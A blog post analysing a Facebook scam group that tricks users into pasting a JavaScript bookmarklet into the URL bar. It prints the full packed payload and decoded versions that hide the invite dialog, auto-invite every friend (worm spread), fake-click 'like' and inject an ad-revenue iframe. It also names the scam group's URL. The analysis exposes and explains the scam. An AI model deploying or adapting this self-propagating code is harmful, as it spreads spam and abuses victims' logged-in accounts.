Facebook worm ahead

A few days ago I got a Facebook notification about a friend of mine suggesting that I "like" some group.

It was a group that finds your celebrity twin (in terms of appearance). I have heard about some technologies that can do that, so I went to see what the group is about, knowing that most of them are scams.

This group was not an exception: it asked you to click "like" in order to show its info page, after that it asked you to click a link, and after clicking that link a modal window appeared.

It first asks you which browser you are using (WTF?), then it makes you do a series of keyboard combinations (Ctrl-C, Alt-D, Ctrl-V in Firefox) that ends up pasting a nasty piece of JavaScript code into your URL bar, and then they ask you to press Enter :)

Of course I didn't, and I took that code and started to analyze it:

// Bookmarklet exactly as the scam page asked the victim to paste into the URL bar.
// The wrapper assigns five element-id strings (a, b, ifc, ifo, mw) as bare globals and
// then eval()s the result of a standard p,a,c,k,e,r unpacker applied to the packed
// payload string; the unpacked form is shown further down in the post.
// NOTE(review): `c35?` inside the unpacker looks like an extraction artifact (the `<`
// of the comparison dropped by HTML rendering) rather than part of the original code;
// the unpacked listing below does not depend on it.
javascript:(function(){a='app134292463250339_jop';b='app134292463250339_jode';ifc='app134292463250339_ifc';ifo='app134292463250339_ifo';mw='app134292463250339_mwrapper';eval(function(p,a,c,k,e,r){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]](V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b)[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]](e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E);C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]](c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea|x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64|x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000|x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|document|mw|fs|SocialGraphManager|ifo|ifc|||||||'.split('|'),0,{}))})();

As I have done my fair share of JavaScript coding, I quickly identified it as minified by Dean Edwards' Packer (function(p,a,c,k,e,r) is an easy way to see that).

So the next thing was to de-minify it; that was done by running the inner function in Firebug, and what I got was this:

// Output of running the p,a,c,k,e,r stage once: the same payload with its string table
// still hex-escaped. Decoded, _0x95ea[0..16] is (see the Python output further down):
//   0 visibility, 1 style, 2 getElementById, 3 hidden, 4 innerHTML, 5 value,
//   6 suggest, 7 likeme, 8 MouseEvents, 9 createEvent, 10 click, 11 initEvent,
//   12 dispatchEvent, 13 select_all, 14 sgm_invite_form,
//   15 /ajax/social_graph/invite_dialog.php, 16 submitDialog
// a, b, ifc, ifo and mw are the element-id strings set by the bookmarklet wrapper;
// fs and SocialGraphManager are globals of the page this runs in and are not defined
// here. Every assignment is a bare global (no var), as expected for code pasted into
// the URL bar of a page that is already open and logged in.
var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];
d=document;
// getElementById(mw).style.visibility = 'hidden': hides the wrapper element, presumably
// so the victim never sees the dialog the rest of the script drives.
d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];
// getElementById(a).innerHTML = getElementById(b).value: copies the text of a form
// field into the page as markup (an innerHTML sink fed from a value attribute).
d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];
s=d[_0x95ea[2]](_0x95ea[6]);   // element with id "suggest"
m=d[_0x95ea[2]](_0x95ea[7]);   // element with id "likeme"
// Synthetic click: createEvent('MouseEvents'), initEvent('click', bubbles, cancelable).
c=d[_0x95ea[9]](_0x95ea[8]);
c[_0x95ea[11]](_0x95ea[10],true,true);
s[_0x95ea[12]](c);             // dispatch the click on "suggest"
// Three timers, all with the same 5000 ms delay (in practice they fire in the order
// scheduled), giving whatever the click above opened time to load:
//   1. fs.select_all() -- page-provided helper; presumably selects every friend in the
//      invite dialog, which cannot be verified from this snippet alone
//   2. SocialGraphManager.submitDialog('sgm_invite_form', '/ajax/social_graph/invite_dialog.php')
//      -- submits the invite form through the page's own API: the propagation step
//   3. click on "likeme", then getElementById(ifo).innerHTML = getElementById(ifc).value
//      -- a second innerHTML injection (the iframe shown further down in the post)
setTimeout(function(){fs[_0x95ea[13]]()},5000);
setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);
setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000);

So it seems there is another layer of obfuscation. The most interesting thing was the _0x95ea array, which was hex encoded, so I just copy-pasted it into a Python shell, and the result was:

['visibility', 'style', 'getElementById', 'hidden', 'innerHTML', 'value', 'suggest', 'likeme', 'MouseEvents', 'createEvent', 'click', 'initEvent', 'dispatchEvent', 'select_all', 'sgm_invite_form', '/ajax/social_graph/invite_dialog.php', 'submitDialog']

OK, so that seems to be a list of JavaScript properties/methods and some other constants, and we can see that the rest of the code is just referencing the array, so let's just replace the code with the values from the array:

// Same payload with every _0x95ea[i] replaced by its decoded string. The original
// post's listing was split mid-string by the paste; it is re-joined here, code unchanged.
d=document;
// Hide the wrapper element (id from the bookmarklet's mw) so the victim does not see
// what the rest of the script does in the page.
d['getElementById'](mw)['style']['visibility']='hidden';
// innerHTML sink fed from a form field's value: element a receives element b's text as markup.
d['getElementById'](a)['innerHTML']=d['getElementById'](b)['value'];
s=d['getElementById']('suggest');
m=d['getElementById']('likeme');
// Build one synthetic, bubbling, cancelable click event and reuse it below.
c=d['createEvent']('MouseEvents');
c['initEvent']('click',true,true);
s['dispatchEvent'](c);   // fake click on "suggest"
// All three timers use the same 5000 ms delay, so in practice they fire in this order.
// fs is a global of the hosting page, not defined here; presumably it selects every
// friend in the invite dialog opened by the click above.
setTimeout(function(){fs['select_all']()},5000);
// Submit the invite form through the page's own SocialGraphManager API: this is the
// step that spreads the scam to the victim's friends.
setTimeout(function(){SocialGraphManager['submitDialog']('sgm_invite_form','/ajax/social_graph/invite_dialog.php')},5000);
setTimeout(function(){
      m['dispatchEvent'](c);   // fake click on "likeme"
      // Second innerHTML injection: element ifo receives element ifc's value as markup
      // (the iframe fragment shown further down in the post).
      d['getElementById'](ifo)['innerHTML']=d['getElementById'](ifc)['value']
},5000);

OK, so at first look I thought that it was only opening the invite window, hiding it and sending an invitation to your friends (that is the way I got the invitation, and that is the worm-like behavior).

But that was because I had overlooked this line:

// innerHTML sink: whatever text sits in the value of element ifc is written into
// element ifo as live markup, so a string inside a form field becomes an iframe.
d['getElementById'](ifo)['innerHTML']=d['getElementById'](ifc)['value']

This line injects this HTML fragment into the page:

<iframe width="700" height="550" frameborder="0" scrolling="yes" src="http://xa.ly/Vx"></iframe>

which is a link to some kind of link shortener that gives you money for each impression, and it also redirects you to a page with ads, so the creator of this page makes some $$ for each sucker that clicks like!

The group currently has 17,000ish users; at 10 cents (an assumption) per impression, he made a nice 1740$ out of thin air!

So that's it: it spreads like a worm (although a bit manual) and makes the author some money.

The thing is that the technique can be used to do real evil stuff like stealing your Facebook account (for example by sending your cookies to a remote server), since the pasted code runs inside the logged-in Facebook page with that page's own origin. Most tech-savvy people out there will not fall for this kind of crap, but 17,000 stupid users already did.

PS: the link to the group is http://www.facebook.com/pages/hds-mzw-t-htwm-slkm-bpyysbwq-wbd/128140680541003 It is in Hebrew, so the target audience is small; I wonder how many people an English group could attract :)

PS2: I reported this group, but that doesn't seem to shut down this page. I hope that this post will make Facebook shut down this kind of group.